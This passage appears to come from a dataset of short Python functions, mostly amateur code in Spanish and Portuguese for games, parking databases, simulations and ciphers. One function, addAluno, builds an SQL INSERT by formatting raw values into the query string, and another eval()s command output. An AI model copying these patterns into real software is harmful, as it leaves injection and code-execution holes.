range (1,largo -1):\n kasino.mapa[i][0]= \" ║\"\n kasino.mapa[i][ancho-1]= \"║\"\n \n kasino.mapa [0][0]=\" ╔\"\n kasino.mapa [0][ancho-1]=\"╗\"\n kasino.mapa [largo-1][0]=\" ╚\"\n kasino.mapa [largo-1][ancho-1]=\"╝\"", "def limpiarVentana(self):\n self.limpiarTabla(self.tableFactura)\n self.lineNumero.setEnabled(True)\n self.lineNumero.clear()\n self.limpiarTabla(self.tableNC)", "def andar(self, nome, comando):\n sai = json.loads(self.orm.get_mapa(self.orm.get_global(nome).local).saidas)\n if comando not in sai.keys():\n return 'esse local nao existe! nao o enchergo daqui...'\n\n self.orm.update_global(nome, local=sai[comando])\n irs = self.orm.get_mapa(self.orm.get_global(nome).local).nome_amigavel.split('|')[0]\n return f'voçê foi para {irs}'", "def matriculaAlParking(placa):\n con = lite.connect('parking.db')\n cur = con.cursor()\n try:\n cur.execute(\"SELECT id_cotxe FROM parking WHERE placa=?;\",(placa,))\n row = cur.fetchone()\n if row:\n print \"En la Posicio\", placa, \" hi ha el cotxe amb matricula\", row[0]\n else:\n print \"La plaça\", placa,\"esta buida.\"\n except:\n pass\n con.close()", "def crear_dicionarios():\r\n valor_alfanumerico = {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6, 'g': 7, 'h': 8, 'i': 9, 'j': 10, 'k': 11, 'l': 12,\r\n 'm': 13, 'n': 14, 'ñ': 15, 'o': 16, 'p': 17, 'q': 18, 'r': 19, 's': 20, 't': 21, 'u': 22, 'v': 23, 'w': 24, 'x': 25, 'y': 26,\r\n 'z': 27, 'A': 28, 'B': 29, 'C': 30, 'D': 31, 'E': 32, 'F': 33, 'G': 34, 'H': 35, 'I': 36, 'J': 37, 'K': 38, 'L': 39, 'M': 40,\r\n 'N': 41, 'Ñ': 42, 'O': 43, 'P': 44, 'Q': 45, 'R': 46, 'S': 47, 'T': 48, 'U': 49, 'V': 50, 'W': 51, 'X': 52, 'Y': 53, 'Z': 54,\r\n 'á': 55, 'Á': 56, 'é': 57, 'É': 58, 'í': 59, 'Í': 60, 'ó': 61, 'Ó': 62, 'ú': 63, 'Ú': 64, '/': 65, '(': 66, ')': 67, '\"': 68,\r\n '=': 69, '&': 70, '%': 71, '$': 72, '#': 73, '!': 74, '¡': 75, '¿': 76, '?': 77, '*': 78, '-': 79, '+': 80, \"'\": 81, '0': 82,\r\n '1': 83, '2': 84, '3': 85, '4': 86, '5': 87, '6': 88, '7': 89, '8': 90, '9': 91, '|': 92, '°': 93, '<': 94, '>': 95, '{': 96,\r\n '}': 97, '[': 98, ']': 99, ',': 100, '.': 101, ':': 102, ';': 103, '_': 104, '^': 105, '`': 106, '~': 107, '¬': 108, ' ': 109}\r\n return valor_alfanumerico", "def addAluno(self, dados, situacao, login, turma):\r\n try:\r\n self.cursor.execute(\"INSERT INTO ALUNO(MATRICULA, DADOS, SITUACAO, LOGIN, TURMA) VALUES (NULL, '%s', '%s', '%s', %s);\" %(dados, situacao, login, turma))\r\n return True\r\n except:\r\n return False", "def Inicio():\n menu = \"\"\"\n Bienvenido al conversor de monedas 💰\n\n 1 - Pesos colombianos\n 2 - Pesos argentinos\n 3 - Pesos mexicanos\n\n Elige una opción: \"\"\"\n\n opcion = int(input(menu))\n \n if opcion == 1:\n moneda = 'pesos colombianos'\n elif opcion == 2:\n moneda = 'pesos argentinos'\n elif opcion == 3:\n moneda = 'pesos mexicanos'\n else:\n print(f'La opción no es valida')\n\n if opcion == 1 or opcion == 2 or opcion == 3 :\n cambio = conversor(moneda)\n print(f'La cantidad de {cambio[1]} {moneda} en dólares es de {cambio[0]} USD')", "def cauto(self):\n return self[\"cauto\"]", "def letalidade(self):\n self.covidbr['letalidade'] = self.covidbr['obitosAcumulado'] / self.covidbr['casosAcumulado']", "def add_car(matricula, posicio, color, marca):\n global max\n con = lite.connect('parking.db')\n cur = con.cursor()\n if(_formatMatriculaValid(matricula)):\n if(max!=0):\n try:\n cur.execute(\"INSERT INTO cotxes(id_cotxe, color, marca) values (?,?,?);\", (matricula, color, marca))\n cur.execute(\"INSERT INTO parking(id_cotxe, placa, entrada) values (?,?, DATETIME('now'));\",(matricula, posicio))\n con.commit()\n max -=1\n except lite.IntegrityError:\n print \"Error.\"\n else:\n print\"Parking ple. El cotxe\",matricula,\"no ha pogut entrar.\"\n else:\n print(\"Format matricula invalid.\")\n con.close()", "def colocar_especial(tablero_juego, filas, columnas, especiales_nivel, datos_de_especiales, obstaculos, posicion_fruta, posicion_serpiente):\n color_normal = '\\033[0m'\n color_azul = '\\033[34m'\n especial_colocado = choice(especiales_nivel)\n especial = datos_de_especiales[especial_colocado]\n while True:\n posicion_especial = [randint(0, filas-1), randint(0, columnas-1)]\n if not any((esta_contenido_o_igual(posicion_especial, obstaculos), \n esta_contenido_o_igual(posicion_especial, posicion_serpiente), \n esta_contenido_o_igual(posicion_especial, posicion_fruta))): break\n tablero_juego[posicion_especial[0]][posicion_especial[1]] = color_azul + especial_colocado + color_normal\n return posicion_especial, especial_colocado", "def gerarPalavraSecreta():\n global palavraOculta\n for _ in range(len(palavraDoJogo)):\n palavraOculta += '*'\n print(palavraOculta)", "def genera_vacios(lista_anidada):\n lista_vacios = [ ]\n letras = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\"]\n\n for n, x in enumerate(lista_anidada):\n for i, y in enumerate(x):\n if y == \"0\":\n fila = letras[n]\n lugar = str(i+1)\n estacionamiento = fila,lugar\n lista_vacios.append(\"\".join(estacionamiento))\n return lista_vacios", "def emOrdem(self, x):\n if x is not None:\n self.emOrdem(x.getEsquerdo())\n print(x.getChave(), end = ' ')\n self.emOrdem(x.getDireito())", "def primera_palabra_mayuscula(cadena):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n for palabra in palabras: # recorro la palabra separada \n frase_final += palabra.capitalize() + \" \" # agarro la palabra separado y la primera letra la pongo en mayuscula \n return frase_final", "def crearIndices(self):\n l = self.encontrarCaracteres()\n i=0\n for c in l:\n self.indices[c] = i\n i+=1", "def avanzar(self, distancia):\n avance = Vector( math.cos(self.orientacion) * distancia, math.sin(self.orientacion) * distancia )\n self.posicion = self.posicion + avance", "def cauto(self):\n return self['cauto']", "def palabras_iniciales(cadena, letra):\n palabras = cadena.split(\" \")\n palabras_iniciales = \" \"\n for i in palabras:\n if i[0] == letra.lower() or i[0] == letra.upper(): # comparo la primera letra con la letra si es mayuscula o minuscula\n palabras_iniciales += i + \" \" # pongo las palabras acorde a la letra pre-seleccionada\n if palabras_iniciales == \" \":\n print(\"No hay:\", letra, \" en:\", cadena)\n\n return palabras_iniciales", "def colocar_palabra(matrix, palabra, esfila, pos, inicio) :\n for x in range(inicio, inicio+len(palabra) ) :\n if esfila:\n matrix[pos][x] = palabra[x-inicio]\n else:\n matrix[x][pos] = palabra[x-inicio]\n return matrix", "def __init__(self, nombre, cantidad, precio):\n\n # Atributos privados por convensión\n self._an = 15 # Ancho de columna nombre\n self._ac = 8 # Ancho de columna cantidad\n self._ap = 10 # Ancho de columna precio\n self._ast = 10 # Ancho de columna subtotal\n\n # Se inicializan los atributos de la instancia\n self.nombre = nombre\n self.cantidad = cantidad\n self.precio = precio", "def cadena_palabras_con_a(cadena):\n lista=cadena.split(\" \")\n total = \"\"\n for palabra in lista:\n if palabra.startswith(\"a\") or palabra.startswith(\"A\"):\n total += palabra + \" \"\n return total", "def calcular_ocupacion():\n\tcur.execute(\"\"\"\n\t\t\t\tSELECT COUNT(*)\n\t\t\t\tFROM sansanito\n\t\t\t\tWHERE legendary=0\"\"\")\n\tnormales = cur.fetchall()\n\tcur.execute(\"\"\"\n\t\t\t\tSELECT COUNT(*)\n\t\t\t\tFROM sansanito\n\t\t\t\tWHERE legendary=1\"\"\")\n\tlegendarios = cur.fetchall()\n\t# Calcula la ocupacion como cant_normales * 1 + cant_legendarios * 5\n\tocupado = normales[0][0] + 5 * legendarios[0][0]\n\treturn ocupado", "def acao(self, propriedade):\n if not super(Aleatorio, self).acao(propriedade):\n # Se atende criterio aleatorio\n if random.random() > PROBABILIDADE_DE_COMPRA:\n propriedade.compra(self)", "def afficher(self):\n bordRect = (self.pos[0]-5, self.pos[1]-5, self.dim[0]+5, self.dim[1]+5)\n Fond = pygame.draw.rect(self.ecran.surface, self.ecran.couleur, bordRect, 0) # Efface le precedant text\n\n rang = 0\n verif = \"\"\n compteur = 0\n self.lignes = []\n if self.txt == \"\": self.txt = \" \"\n \n while verif != self.txt:\n verif =\"\"\n rang += self.correction(self.txt[rang:], compteur)\n compteur += 1\n for k in self.lignes:\n verif += k.txt\n\n for compteur in range(len(self.lignes)):\n self.lignes[compteur].afficher()\n\n self.dim = (self.dim[0], self.hLigne*(compteur+1)) # +1 -> Boucle for\n \n pygame.display.flip()", "def change(coor):\n return chr(coor[0] + 65), coor[1] + 1", "def muestraLado(v1, v2, posicionInicial):\n\tvertices = [v1, v2]\n\tlados = [(0, 1)]\n\tcaras = []\n\tmeshLado = bpy.data.meshes.new(\"lado\")\n\tobjLado = bpy.data.objects.new(\"lado\", meshLado)\n\n\t# coloco el objeto lado en la misma posicion que el cursor\n\tobjLado.location = posicionInicial\n\n\t# enlazo el objeto lado a la escena\n\tbpy.context.scene.objects.link(objLado)\n\n\t# creo la maya del objeto lado\n\tmeshLado.from_pydata(vertices,lados,caras)\n\tmeshLado.update(calc_edges=True)\n\n\treturn objLado", "def opcion1_automatica(v):\n v_range = len(v)\n\n for i in range(v_range):\n tit = ('Harry Potter', 'Percy Jackson', 'El Principito', 'Cien años de soledad',\n 'El señor de los anillos', 'Un mundo feliz', 'Orgullo y prejuicio',\n 'Crimen y castigo', 'Lolita', 'Ulises', 'El gran Gatsby', 'Mil soles espléndidos',\n 'Alicia en el país de las maravillas', 'Rebelión en la granja', 'Los pilares de la tierra',\n 'Guerra y paz', 'Memorias de una geisha', 'Frankenstein', 'Los viajes de Gulliver', 'La ladrona de libros')\n\n gen = ('Autoayuda', 'Arte', 'Ficción', 'Computación', 'Economía',\n 'Escolar', 'Sociedad', 'Gastronomía', 'Infantil', 'Otros')\n\n lang_list = ('Español', 'Inglés', 'Francés', 'Italiano', 'Otros')\n titulo = random.choice(tit)\n genero = random.choice(gen)\n isbn = auto_gen_isbn()\n idioma = random.choice(lang_list)\n precio = round(random.uniform(0, 2000), 2)\n v[i] = Libro(isbn, titulo, genero, idioma, precio)\n\n print()\n print('\\t\\tVECTOR CARGADO')\n print()", "def intenta_adelantar_camion_manipuleo(self, sistema, operacion, medio_de_almacenamiento):\r\n\r\n entre_primeros_cola_m_a = \\\r\n self.entre_primeros_cola_medio_de_almacenamiento(medio_de_almacenamiento)\r\n\r\n entre_primeros_cola_r_a = \\\r\n self.entre_primeros_cola_recurso(operacion.recurso)\r\n\r\n # El camion verifica si puede adelantar algun camion por detras en la cola del\r\n # medio de almacenamiento que disponga producto/espacio y este por detras en la\r\n # cola del recurso de atención\r\n if entre_primeros_cola_m_a and entre_primeros_cola_r_a and \\\r\n any(c.dispone_producto_espacio_medio_almacenamiento(medio_de_almacenamiento) and\r\n c.atras_de_camion_en_cola_recurso(self, operacion.recurso)\r\n for c in medio_de_almacenamiento.cola_detras_de_camion(self)):\r\n c_adelantado = [ca for ca in medio_de_almacenamiento.cola_detras_de_camion(self)\r\n if ca.dispone_producto_espacio_medios_almacenamiento(sistema) and\r\n ca.atras_de_camion_en_cola_recurso(self, operacion.recurso)][0]\r\n\r\n self.adelanta_camion(sistema, operacion, medio_de_almacenamiento, c_adelantado, \"Almacen\")\r\n\r\n # El camion verifica si puede adelantar algun camion por detras en la cola del\r\n # medio de almacenamiento que disponga producto/espacio y este entre los primeros\r\n # en alguna cola de recursos de atención\r\n if entre_primeros_cola_m_a and \\\r\n any(c.dispone_producto_espacio_medio_almacenamiento(medio_de_almacenamiento) and\r\n c.entre_primeros_colas_recursos(sistema.recursos_atencion)\r\n for c in medio_de_almacenamiento.cola_detras_de_camion(self)):\r\n c_adelantado = [ca for ca in medio_de_almacenamiento.cola_detras_de_camion(self)\r\n if ca.dispone_producto_espacio_medios_almacenamiento(sistema) and\r\n ca.entre_primeros_colas_recursos(sistema.recursos_atencion)][0]\r\n\r\n self.adelanta_camion(sistema, operacion, medio_de_almacenamiento, c_adelantado, \"Almacen\")\r\n\r\n # El camion verifica si puede adelantar algun camion por detras en la cola del\r\n # recurso de atención que disponga producto/espacio y este entre los primeros\r\n # en alguna cola de medios de almacenamiento\r\n if entre_primeros_cola_r_a and \\\r\n any(c.dispone_producto_espacio_y_entre_primeros_medios_almacenamiento(sistema) # TODO rev. posib. bugs\r\n for c in operacion.recurso.cola_detras_de_camion(self)):\r\n c_adelantado = [ca for ca in operacion.recurso.cola_detras_de_camion(self)\r\n if ca.dispone_producto_espacio_medios_almacenamiento(sistema) and\r\n ca.entre_primeros_colas_medios_almacenamiento(sistema)][0]\r\n\r\n self.adelanta_camion(sistema, operacion, medio_de_almacenamiento, c_adelantado, \"Operacion\")", "def coste_de_aplicar_accion(self, estado, accion):\n return 1", "def __init__(self, nombre, cantidad, precio, marca, modelo):\n\n # Se ejecuta el constructor de la clase padre\n super().__init__(nombre, cantidad, precio)\n\n # Se modifica el valor de un atributo privado\n self._an = 25\n\n # Se inicializan los atributos de la clase hija\n self.marca = marca\n self.modelo = modelo", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)", "def translate_to_algebraic(location):\n\n columns = 'abcdefghi'\n return columns[location[0]] + str(location[1] + 1)", "def Es_adyacente(self,coordenada:list) -> bool:\n\n\t\tx=coordenada[0] # FILA\n\t\ty=coordenada[1] # COLUMNA\n\n\t\t#Busqueda en el interior del tablero\n\t\tif x<5 and x>0 and y<5 and y>0 :\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\n\t\t#Busqueda en los bordes del tablero\n\t\tif x==5 and y>0 and y<5 :\n\t\t\tif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif x==0 and y>0 and y<5:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif y==5 and x<5 and x>0:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif y==0 and x<5 and x>0:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\n\t\t#busqueda en las esquinas del tablero\n\t\tif x==0 and y==0:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif x==0 and y==5:\n\t\t\tif self.tablero[x+1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x+1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif x==5 and y==0:\n\t\t\tif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y+1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif x==5 and y==5:\n\t\t\tif self.tablero[x-1][y]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x-1][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telif self.tablero[x][y-1]!=0:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False", "def vigenere(phrase, clef, operation):\n sortie, i = \"\", 0\n for caract in phrase: #parcours de la chaine a traiter\n if operation == \"1\": #chiffrement\n sortie = sortie + chr((ord(caract) + ord(clef[i])) % 256)\n i = i + 1 #parcours de la cle\n if i > len(clef) - 1:\n i = 0 #fin de cle atteinte, on repart au debut\n elif operation == \"2\": #dechiffrement\n sortie = sortie + chr((ord(caract) - ord(clef[i])) % 256)\n i = i + 1\n if i > len(clef) - 1:\n i = 0\n return sortie", "def update_cola(self):\n self.listUsuarioAtentiendo.append(self.listUsuario[0])\n self.listUsuario.pop(0)\n self.cola -= 1", "def inicializar_tablero(self):\n\n cont_pixels_x = 0 # Para contar los pixeles en x, y tenerlos como referencia en la casilla correspondiente\n cont_pixels_y = 0 # Para contar los pixeles en y, y tenerlos como referencia en la casilla correspondiente\n pixels_cuadro = 100\n\n for f in range(len(self._matriz)): # Inicializando la matriz del tablero que va a contener los objetos casilla\n cont_pixels_y += pixels_cuadro\n for c in range(len(self._matriz[f])):\n cont_pixels_x += pixels_cuadro\n\n # Por el momento solo se estara utilizando una ficha para pruebas.\n if f == 0 and c == 1: #(superior_izq, superior_der, inferior_izq, inferior_der )\n self._matriz[f][c] = Casilla (Ficha('f_marron.png'), (f, c), (cont_pixels_x - pixels_cuadro, cont_pixels_x, cont_pixels_y - pixels_cuadro, cont_pixels_y))\n\n else:\n self._matriz[f][c] = Casilla(None, (f, c), (cont_pixels_x - pixels_cuadro, cont_pixels_x, cont_pixels_y - pixels_cuadro, cont_pixels_y))\n\n cont_pixels_x = 0 # Bajar la columna\n\n\n return self._matriz", "def soma(conexao, valores):\n try:\n return '{0}'.format(float(valores[1]) + float(valores[2]))\n except:\n return 'ERRO'", "def CL(self):", "def area_cuadrado(lado):\n area = lado**2\n print \"El area es: \",area", "def pyramida(zakladna, orientacia, centrovanie):\n nova_pyramida = []\n if orientacia not in [\"normalna\", 'obratena']:\n print(\"Pyramida moze byt iba [normalna] alebo [obratena]\")\n return False\n\n if centrovanie != \"center\" and centrovanie != \"vlavo\":\n print(\"Centrovanie pyramidy moze byt iba [center] alebo [vlavo]\")\n return False\n\n if centrovanie == \"center\":\n if orientacia == \"normalna\":\n\n cislo_riadka = -1\n for i in range(1, zakladna + 1, 2): #pocet hviezdiciek rastie po 2\n #print(f\"{'*' * i:^{zakladna}}\")\n cislo_riadka +=1\n riadok = []\n for j in range(cislo_riadka,zakladna//2): #vyska pyramidy = polovica zakladne\n riadok.append(\" \") #kolky riadok, tolko medzier vlavo\n for j in range(0, i):\n riadok.append(\"*\")\n for j in range(cislo_riadka,zakladna//2): # aj v pravo\n riadok.append(\" \")\n nova_pyramida.append(riadok)\n else:\n cislo_riadka = -1\n for i in range(zakladna, 0, -2): #pocet hviezdiciek\n #print(f\"{'*' * i:^{zakladna}}\")\n cislo_riadka +=1\n riadok = []\n for j in range(0,cislo_riadka):\n riadok.append(\" \")\n for j in range(0,i):\n riadok.append(\"*\")\n for j in range(0,cislo_riadka):\n riadok.append(\" \")\n nova_pyramida.append(riadok)\n else:\n if orientacia == \"normalna\":\n for i in range(zakladna):\n #print(f\"{'*' * (i + 1)}\")\n riadok = []\n for j in range(0,i):\n riadok.append(\"*\")\n nova_pyramida.append(riadok)\n else:\n for i in range(zakladna):\n riadok = []\n #print(f\"{'*' * (zakladna - i)}\")\n for j in range(zakladna, i, -1):\n riadok.append(\"*\")\n nova_pyramida.append(riadok)\n return nova_pyramida", "def ConUACalc(self):\n if hasattr(self,\"con\"): return self.con\n st = self.uacalc_format(\"A\"+str(self.index))\n writefile('tmpalgCon.ua',st)\n os.system('java -classpath '+clspth+'uacalc/classes/ org.uacalc.example.ConUACalc tmpalgCon.ua >tmpoutCon.txt')\n st = readfile('tmpoutCon.txt')\n st = st[st.index(\"[\"):] # remove diagnostic output\n self.con = eval(st)\n return self.con", "def combinar(memoria):\n\n antLibre = False\n antEspacio = 0\n\n for part in memoria[:]:\n if antLibre and part[1] == None:\n part[0] += antEspacio\n del memoria[memoria.index(part) - 1]\n\n if part[1] == None:\n antLibre = True\n else:\n antLibre = False\n\n antEspacio = part[0]\n\n return memoria", "def accueil():\r\n global etat\r\n background(0,128,128)\r\n image(tireur,0,0) \r\n rectMode(CORNERS)\r\n fill(100)\r\n rect(0,60,250,120)\r\n rect(500,60,750,120)\r\n fill(0)\r\n textSize(30)\r\n text(\"PVP\",95,100) \r\n text(\"ORDINATEUR\",520,100) \r\n if (mousePressed) and mouseX<250 and mouseX>0 and mouseY<120 and mouseY>60: #si on clique sur le rectangle jouer\r\n etat=1 #on passe en mode jeu\r\n if (mousePressed) and mouseX<750 and mouseX>500 and mouseY<120 and mouseY>60: \r\n etat=2", "def solicita_adelanto_operacion(self, sistema, operacion, medio_de_almacenamiento=None):\r\n\r\n primeros_cola_r_a = operacion.recurso.cola[0:operacion.recurso.capacity]\r\n primeros_cola_r_a_disponen_p_e_s_o_manip =\\\r\n all(camion.dispone_producto_espacio_sistema(sistema) or camion.manipulado.triggered\r\n for camion in primeros_cola_r_a)\r\n\r\n if operacion.recurso.nombre == \"Balanza 2\":\r\n pass\r\n elif operacion.nombre == \"Primer pesaje - B3\":\r\n operacion.recurso.cola[operacion.recurso.count].adelanta_camion(\r\n sistema, operacion, medio_de_almacenamiento, self, \"Operacion\")\r\n elif (self.dispone_producto_espacio_sistema(sistema) or self.manipulado.triggered) \\\r\n and not primeros_cola_r_a_disponen_p_e_s_o_manip:\r\n primeros_cola_r_a[operacion.recurso.count].adelanta_camion(\r\n sistema, operacion, medio_de_almacenamiento, self, \"Operacion\")", "def initialize_bolsa(self,nivel):", "def es_satisfecho_por(self, candidata):", "def ir(self):\n if not self._chamados:\n self._andar = 0\n else:\n super().ir() # metodo irado de falar q ta usando function base.", "def entrada(self, linha, coluna):\n matriz = [[ 0 for x in range(coluna) ] for y in range (linha)]\n vetor_linha = [0, 1, 0, -1]\n vetor_coluna = [1, 0, -1, 0]\n l = 0\n c = 0\n direcao = 0\n for n in range(linha * coluna):\n matriz[l][c] = n + 1\n if ((vetor_coluna[direcao] == 1 and c == coluna - 1) or \n (vetor_linha[direcao] == 1 and l == linha - 1) or\n (vetor_coluna[direcao] == -1 and c == 0) or\n (matriz[l + vetor_linha[direcao]][c + vetor_coluna[direcao]] != 0)):\n direcao = (direcao + 1) % 4\n l += vetor_linha[direcao]\n c += vetor_coluna[direcao]\n return matriz", "def leerUltrasonido() -> int:\n pass", "def Permite_salto(self,coordenada:list,color:int) -> bool:\n\n\t\t#coordenadas\n\t\tfila = coordenada[0]\n\t\tcolumna = coordenada[1]\n\n\t\t#lista de direciones en las que se podia saltar\n\t\tkey=[False]*8\n\n\t\t#La coordenada en donde se desea posicionar la ficha debe ser adyacente a alguna ficha ya puesta\n\t\tif self.Es_adyacente(coordenada):\n\n\t\t\t#Por cada direccion se analiza si permite el salto\n\n\t\t\t#abajo\n\t\t\taux = columna+1\n\t\t\tif aux<5 and aux>0:\n\t\t\t\tif color==1:\n\t\t\t\t\tif self.tablero[fila][aux]==2:\n\t\t\t\t\t\tfor i in range(5-aux):\n\t\t\t\t\t\t\tif self.tablero[fila][aux+i+1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,aux],[fila,aux+i+1],\"derecha\",1)\n\t\t\t\t\t\t\t\tkey[0]=True\n\t\t\t\tif color==2:\n\t\t\t\t\tif self.tablero[fila][aux]==1:\n\t\t\t\t\t\tfor i in range(5-aux):\n\t\t\t\t\t\t\tif self.tablero[fila][aux+i+1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,aux],[fila,aux+i+1],\"derecha\",2)\n\t\t\t\t\t\t\t\tkey[0]=True\n\t\t\t#arriba\n\t\t\taux = columna-1\n\t\t\tif aux<5 and aux>0:\n\t\t\t\tif color==1:\n\t\t\t\t\tif self.tablero[fila][aux]==2:\n\t\t\t\t\t\tfor i in range(aux):\n\t\t\t\t\t\t\tif self.tablero[fila][aux-i-1]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,aux],[fila,aux-i-1],\"izquierda\",1)\n\t\t\t\t\t\t\t\tkey[1]=True\n\t\t\t\tif color==2:\n\t\t\t\t\tif self.tablero[fila][aux]==1:\n\t\t\t\t\t\tfor i in range(aux):\n\t\t\t\t\t\t\tif self.tablero[fila][aux-i-1]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,aux],[fila,aux-i-1],\"izquierda\",2)\n\t\t\t\t\t\t\t\tkey[1]=True\n\t\t\t#derecha\n\t\t\taux = fila+1\n\t\t\tif aux<5 and aux>0:\n\t\t\t\tif color==1:\n\t\t\t\t\tif self.tablero[aux][columna]==2:\n\t\t\t\t\t\tfor i in range(5-aux):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][columna]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,columna],\"abajo\",1)\n\t\t\t\t\t\t\t\tkey[2]=True\n\t\t\t\tif color==2:\n\t\t\t\t\tif self.tablero[aux][columna]==1:\n\t\t\t\t\t\tfor i in range(5-aux):\n\t\t\t\t\t\t\tif self.tablero[aux+i+1][columna]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux+i+1,columna],\"abajo\",2)\n\t\t\t\t\t\t\t\tkey[2]=True\n\t\t\t#izquierda\n\t\t\taux = fila-1\n\t\t\tif aux<5 and aux>0:\n\t\t\t\tif color==1:\n\t\t\t\t\tif self.tablero[aux][columna]==2:\n\t\t\t\t\t\tfor i in range(aux):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][columna]==1:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,columna],\"arriba\",1)\n\t\t\t\t\t\t\t\tkey[3]=True\n\t\t\t\tif color==2:\n\t\t\t\t\tif self.tablero[aux][columna]==1:\n\t\t\t\t\t\tfor i in range(aux):\n\t\t\t\t\t\t\tif self.tablero[aux-i-1][columna]==2:\n\t\t\t\t\t\t\t\tif not self.generando_jugadas:\n\t\t\t\t\t\t\t\t\tself.Convertir([fila,columna],[aux-i-1,columna],\"arriba\",2)\n\t\t\t\t\t\t\t\tkey[3]=True\n\t\t\t#abajo-izquerda\n\t\t\taux = fila-1\n\t\t\taux2 = columna+1\n\t\t\tif aux<5 and aux>0 and aux2<5 and aux2>0:\n\t\t\t\tpar = [aux,5-aux2]\n\t\t\t\tif color==1:\n\t\t\t\t\trango = min(par)\n\t\t\t\t\tif self.tablero[aux][aux2]==2:\n\t\t\t\t\t\tfor i in range(rango):\n\t\t\t\t\t\t\tif 